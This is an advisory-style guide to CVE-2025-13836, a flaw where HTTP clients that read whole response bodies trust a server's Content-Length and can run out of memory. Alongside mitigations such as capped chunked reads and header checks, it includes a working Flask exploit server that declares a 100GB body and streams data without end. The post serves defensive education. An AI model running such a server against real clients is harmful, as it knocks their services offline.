HTTP clients are everywhere: web browsers, API clients, bots. But sometimes an overlooked default can open the door for attackers. CVE-2025-13836 highlights one of these simple yet dangerous issues: when an HTTP client reads a server response without specifying a byte limit, it implicitly trusts the server's Content-Length value. A malicious server can exploit that trust to trigger Out-Of-Memory (OOM) crashes or Denial-of-Service (DoS) conditions.

In this guide, we'll explain how this happens, view reference materials, see example code, and build a working exploit to illustrate the danger.

🛑 Vulnerability Summary

Many HTTP clients, when receiving a server response, use the Content-Length header to know how many bytes to read. But there's a catch: if the client just trusts this number without bounds—or doesn't specify any read limit at all—a malicious server can tell the client to read gigabytes, or more, of data.

This data is loaded into memory, and if the system can’t handle it, the process will crash or become unresponsive.

Attack Scenario

- Step 1: Attacker sets up a server that responds with a huge Content-Length header (e.g., 100GB).
- Step 2: Client, using default settings, tries to read and allocate memory for the entire response.
- Step 3: The client exhausts available memory and crashes (OOM) or becomes unresponsive.
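The steps above can be sketched end-to-end with only the standard library (a hypothetical local demo: the "server" declares a 100GB body but sends nothing beyond the headers, so no real data is transferred):

```python
import http.client
import socket
import threading

def evil_server(listener):
    """Accept one connection, declare a 100 GB body, send only the headers."""
    conn, _ = listener.accept()
    conn.recv(4096)  # read (and ignore) the client's request
    conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 107374182400\r\n\r\n")
    conn.close()

listener = socket.socket()
listener.bind(('127.0.0.1', 0))  # pick any free port
listener.listen(1)
port = listener.getsockname()[1]
threading.Thread(target=evil_server, args=(listener,), daemon=True).start()

conn = http.client.HTTPConnection('127.0.0.1', port)
conn.request('GET', '/large-response')
resp = conn.getresponse()
print(resp.getheader('Content-Length'))  # the client records whatever is claimed
```

The client happily records the declared 107374182400 bytes; a naive `resp.read()` at this point would try to consume all of it.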

👨‍💻 Code Example (Python)

Here's a simple Python snippet using requests, a popular HTTP client library.

import requests

# URL controlled by the attacker
response = requests.get('http://malicious-server.example/large-response')

# The following reads the entire response body into memory at once.
data = response.content  # Danger! May trigger OOM

If the server returns

HTTP/1.1 200 OK
Content-Length: 107374182400

the line response.content will try to buffer all 100GB in RAM, even if the server never really delivers that much, or worse, streams it forever.
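A cheap first line of defense is to inspect the declared length before touching the body. Here is a minimal sketch (the helper name check_declared_length is hypothetical; note that a malicious server can also under-declare or omit the header entirely, so this complements, rather than replaces, a streaming cap):

```python
def check_declared_length(headers, max_bytes):
    """Refuse responses whose declared Content-Length exceeds max_bytes."""
    declared = headers.get('Content-Length')
    if declared is None:
        return  # chunked or unknown length: rely on a streaming cap instead
    if int(declared) > max_bytes:
        raise ValueError(
            f"Refusing response: server declares {declared} bytes, cap is {max_bytes}"
        )

# A small declaration passes; a 100 GB one is rejected before any body is read
check_declared_length({'Content-Length': '4096'}, 10 * 1024 * 1024)
```

With requests, you would call this on `r.headers` of a `stream=True` response before iterating over the body.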

Let's see a quick Python exploit server using Flask that demonstrates the attack:

from flask import Flask, Response

app = Flask(__name__)

@app.route('/large-response')
def big_response():
    def generate():
        # Stream data forever in 1MB chunks
        while True:
            yield b'A' * 1024 * 1024

    headers = {
        # Declare a 100GB body, regardless of what is actually sent
        'Content-Length': str(100 * 1024 * 1024 * 1024)
    }
    return Response(generate(), headers=headers, mimetype='application/octet-stream')

if __name__ == '__main__':
    app.run(port=8000)

🚨 Impact

- DoS/OOM: The client process crashes or becomes unresponsive.
- Resource Waste: Makes resource-exhaustion attacks much easier.
- Potential Chaining: Can be turned into a remote DoS in more complex applications (APIs, microservices, etc.).

Always set a sensible limit on the amount of data you're willing to read! For instance:

from requests import get

url = 'http://malicious-server.example/large-response'
with get(url, stream=True) as r:
    chunk_size = 1024  # bytes
    max_download = 1024 * 1024 * 10  # 10MB max
    total = 0
    for chunk in r.iter_content(chunk_size=chunk_size):
        total += len(chunk)
        if total > max_download:
            raise Exception("Stopping: Too much data")
        # process(chunk)

Most language clients have a way to read responses in chunks—use them!
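The chunked-read pattern above generalizes to any iterator of byte chunks, which makes it easy to test without a network. A reusable sketch (read_capped is a hypothetical helper name):

```python
def read_capped(chunks, max_bytes):
    """Accumulate byte chunks, aborting as soon as max_bytes is exceeded."""
    buf = bytearray()
    for chunk in chunks:
        buf.extend(chunk)
        if len(buf) > max_bytes:
            raise ValueError(f"Response exceeded {max_bytes}-byte cap")
    return bytes(buf)

# A well-behaved response fits under the cap...
print(read_capped([b'abc', b'def'], 10))  # b'abcdef'

# ...while an endless stream is cut off after ~1MB instead of filling RAM
def endless():
    while True:
        yield b'A' * 1024

try:
    read_capped(endless(), 1024 * 1024)
except ValueError as e:
    print(e)
```

This drops in anywhere you already have `r.iter_content(...)` or an equivalent chunk iterator.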

📚 References

- CVE-2025-13836 at MITRE (awaiting public allocation)
- Python requests Documentation
- Node.js HTTP client issue with large Content-Length
- Relevant Go HTTP bug
- Security best practices for HTTP clients

Audit: Review your code for every place a full response body is read into memory (e.g., response.content, resp.read() with no size argument).

CVE-2025-13836 is a reminder: simple mistakes with big consequences. Keep your clients safe—limit what they’ll accept from the other side.

Timeline

Published on: 12/01/2025 18:02:38 UTC
Last modified on: 02/10/2026 19:58:12 UTC